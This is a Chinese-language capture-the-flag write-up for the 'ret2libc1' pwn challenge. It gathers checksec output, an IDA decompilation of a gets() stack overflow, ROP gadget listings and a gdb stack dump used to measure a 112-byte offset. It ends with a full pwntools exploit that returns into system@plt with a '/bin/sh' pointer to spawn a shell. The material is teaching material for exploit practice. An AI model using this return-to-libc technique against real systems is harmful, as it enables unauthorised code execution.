一、题目
题目:ret2libc1
题目描述:利用栈溢出把 main 的返回地址覆盖为 system@plt;紧接着放一个 system 执行完后要"返回"到的伪返回地址(任意值都能拿到 shell,填 exit 的地址可以让进程干净退出);再放 system 唯一的参数——指向 "/bin/sh" 字符串的指针。由于 NX 已开启,栈上的 shellcode 无法执行,只能复用程序/库里已有的代码,这就是 ret2libc 的思路。
二、WriteUp
1 . 信息收集
checksec ret2libc1
Arch: i386-32-little
RELRO: Partial RELRO
Stack: No canary found
NX: NX enabled
PIE: No PIE ( 0x8048000)
2 . ida+F5
/* IDA (F5) decompilation of the challenge binary's main().
 * The only user input is an unbounded gets() into a fixed-size stack buffer;
 * nothing checks the length, so a long line runs past the buffer into the
 * saved registers and the return address (the 112-byte offset is measured
 * in gdb below, not taken from the static [ebp-64h] figure). */
int __cdecl main(int argc, const char **argv, const char **envp)
{
char s; // [esp+1Ch] [ebp-64h]  -- IDA shows a single char; this is really the start of the stack buffer
setvbuf(stdout, 0, 2, 0); // mode 2 = _IONBF on glibc: stdout unbuffered, output reaches the pipe immediately
setvbuf(_bss_start, 0, 1, 0); // _bss_start is IDA's label for the FILE* at the start of .bss (presumably stdin); mode 1 = _IOLBF
puts("RET2LIBC >_<");
gets(&s); // vulnerability: no bound on the input length, classic stack buffer overflow
return 0;
}
Functions 窗口中同时出现 _system 和 system,说明二进制自己导入了 system,PLT 中有对应的桩(stub);再加上 No PIE(基址固定为 0x8048000),system@plt 的地址每次运行都不变,因此不需要泄漏 libc 基址就能直接调用 system。
在functions窗口搜索_system函数
.plt:08048460 jmp ds:off_804A018
.plt:08048460 _system endp
第一次调用:call system → system@plt → 跳到 system@got 中保存的地址(此时还是指回 PLT 的桩)→ 进入动态链接器的解析流程(resolve),把 system 在 libc 中的真实地址填写到 system@got → 跳到 libc 中的 system。
之后的调用:call system → system@plt → system@got(已填好真实地址)→ libc 中的 system。这一延迟绑定流程依赖 GOT 可写,正对应 checksec 中的 Partial RELRO;不过本题只需要 system@plt 这个固定地址,不需要读或改 GOT。
3 . ROPgadget --binary ret2libc1 --only "pop|ret"
Gadgets information
== == == == == == == == == == == == == == == == == == == == == == == == == == == == == ==
0x080486ef : pop ebp ; ret
0x080486ec : pop ebx ; pop esi ; pop edi ; pop ebp ; ret
0x0804841d : pop ebx ; ret
0x080486ee : pop edi ; pop ebp ; ret
0x080486ed : pop esi ; pop edi ; pop ebp ; ret
0x08048406 : ret
0x0804854e : ret 0xeac1
4 . payload
最终要执行system( "/bin/sh" )
.rodata:08048720 aBinSh db '/bin/sh' ,0 ; DATA XREF: .data:shell↓o
① system@plt 地址——覆盖 main 的返回地址,ret 后直接进入 system 的 PLT 桩;
② system 的返回地址——system 执行完毕后会 ret 到这里;exp 中直接用 4 字节 'B' 填充(shell 退出后程序崩溃),想干净退出可以填 exit 的地址;
③ "/bin/sh" 字符串的地址——按 32 位 cdecl 约定放在返回地址之后,就是 system 的第一个参数;
④ 0——"/bin/sh" 末尾的 NUL 终止符(见 .rodata 中 aBinSh db '/bin/sh',0),字符串本身在二进制里已经带有,payload 中不必再写;gets 也会在输入末尾补一个 0。
5 . gdb ret2libc1
b main
r
n
输入 AAAABBBBCCCCDDDD(单步到 gets 返回之后再查看栈,这样既能看到输入在栈上的起始位置,也能看到当前 ebp 和其上方的返回地址,从而精确算出偏移)
00:0000│ esp 0xffffd110 —▸ 0xffffd12c ◂— 'AAAABBBBCCCCDDDD'
01:0004│ 0xffffd114 ◂— 0x0
02:0008│ 0xffffd118 ◂— 0x1
03:000c│ 0xffffd11c ◂— 0x0
.. . ↓ 3 skipped
07:001c│ eax 0xffffd12c ◂— 'AAAABBBBCCCCDDDD'
08:0020│ 0xffffd130 ◂— 'BBBBCCCCDDDD'
09:0024│ 0xffffd134 ◂— 'CCCCDDDD'
0a:0028│ 0xffffd138 ◂— 'DDDD'
0b:002c│ 0xffffd13c ◂— 0x0
0c:0030│ 0xffffd140 —▸ 0x80484d0 ( _start) ◂— xor ebp, ebp
0d:0034│ 0xffffd144 —▸ 0xf7fc9550 ( __kernel_vsyscall) ◂— push ecx
0e:0038│ 0xffffd148 —▸ 0x8048034 ◂— push es
0f:003c│ 0xffffd14c —▸ 0xf7fa5a08 ( __exit_funcs_lock) ◂— 0x0
10 :0040│ 0xffffd150 ◂— 0x1
11 :0044│ 0xffffd154 —▸ 0xf7fdc480 ( _dl_fini) ◂— push ebp
12 :0048│ 0xffffd158 ◂— 0x0
13 :004c│ 0xffffd15c —▸ 0x8048405 ( _init+9) ◂— add ebx, 0x1bfb
14 :0050│ 0xffffd160 —▸ 0xf7fa43fc ( __exit_funcs) —▸ 0xf7fa5a20 ( initial) ◂— 0x0
15 :0054│ 0xffffd164 ◂— 0xffffffff
16 :0058│ 0xffffd168 —▸ 0x804a000 ( _GLOBAL_OFFSET_TABLE_) —▸ 0x8049f14 ( _DYNAMIC) ◂— 0x1
17 :005c│ 0xffffd16c —▸ 0x80486e2 ( __libc_csu_init+82) ◂— add edi, 1
18 :0060│ 0xffffd170 ◂— 0x1
19 :0064│ 0xffffd174 —▸ 0xffffd244 —▸ 0xffffd3f0 ◂— '/home/uaoe/Desktop/ti/ROP/ret2libc1'
1a:0068│ 0xffffd178 —▸ 0xffffd24c —▸ 0xffffd414 ◂— 'SHELL=/usr/bin/zsh'
1b:006c│ 0xffffd17c —▸ 0xf7df0a15 ( __cxa_atexit+37) ◂— add esp, 0x1c
1c:0070│ 0xffffd180 —▸ 0xf7fdc480 ( _dl_fini) ◂— push ebp
1d:0074│ 0xffffd184 ◂— 0x0
1e:0078│ 0xffffd188 —▸ 0x804869b ( __libc_csu_init+11) ◂— add ebx, 0x1965
1f:007c│ 0xffffd18c ◂— 0x0
20 :0080│ 0xffffd190 ◂— 0x1
21 :0084│ 0xffffd194 —▸ 0x80484d0 ( _start) ◂— xor ebp, ebp
22 :0088│ ebp 0xffffd198 ◂— 0x0
23 :008c│ 0xffffd19c —▸ 0xf7dd7905 ( __libc_start_main+229) ◂— add esp, 0x10
ebp 地址 - eax 地址 = 0xffffd198 - 0xffffd12c = 0x6c = 108 字节,再加上保存的 ebp 本身 4 字节,从缓冲区起点(eax)到返回地址(0xffffd19c,当前为 __libc_start_main+229)共 112 字节。注意:IDA 标注的 [ebp-64h] 若按 0x64+4=104 直接计算会比实测少 8 字节,静态偏移与运行时栈布局不一定一致(具体原因要看 main 的汇编 prologue 才能确定),覆盖偏移应以调试器实测为准。
payload 结构:112 字节填充 + system@plt(覆盖返回地址)+ system 的伪返回地址(4 字节)+ "/bin/sh" 的地址。
6 .exp.py
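from pwn import *

# ret2libc1: overflow the gets() buffer in main and return into system@plt with
# a pointer to the "/bin/sh" string that the binary itself carries in .rodata.
elf = ELF("./ret2libc1")
context.binary = elf  # pins arch/bits/endianness so flat() packs 32-bit little-endian words
sh = process("./ret2libc1")

# Both addresses are static because the binary has no PIE (base 0x8048000).
# They are read from the ELF instead of hard-coded so the script still works
# if the challenge binary is rebuilt (the hard-coded values were 0x08048460
# and 0x08048720 for this build).
system_plt = elf.plt["system"]
# search() returns a generator; next() raises StopIteration if the string is
# missing. Matching the trailing NUL avoids hitting a substring of some longer string.
binsh_addr = next(elf.search(b"/bin/sh\x00"))

# Distance from the start of the buffer to main's saved return address, as
# measured in gdb (0xffffd198 - 0xffffd12c + 4). The static [ebp-64h] from IDA
# does not give the right number here -- measure, don't guess.
OFFSET = 112

# Frame after the overflow:  [padding][system@plt][ret addr for system]["/bin/sh" ptr]
# The return address system() returns to is arbitrary (the process crashes once
# the shell exits); use exit's address instead if a clean exit matters.
payload = flat([b"A" * OFFSET, system_plt, b"B" * 4, binsh_addr])

sh.sendline(payload)
sh.interactive()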
7 . 小技巧
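# Let pwntools resolve the addresses instead of copying them out of IDA.
elf = ELF("./ret2libc1")
system_plt = elf.plt["system"]  # system@plt; a fixed address because the binary is not PIE
# elf.search() yields every offset where the bytes occur and raises
# StopIteration via next() if there is none. Searching for the NUL-terminated
# form makes sure the hit is a real C string, not a substring of a longer one.
binsh_addr = next(elf.search(b"/bin/sh\x00"))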
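# Quick check that the binary carries "/bin/sh". -t x also prints the file
# offset in hex; that is an offset, not a virtual address -- map it through the
# containing segment (readelf -l) or simply use elf.search() from pwntools.
strings -t x ret2libc1 | grep /bin/sh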
三、总结
无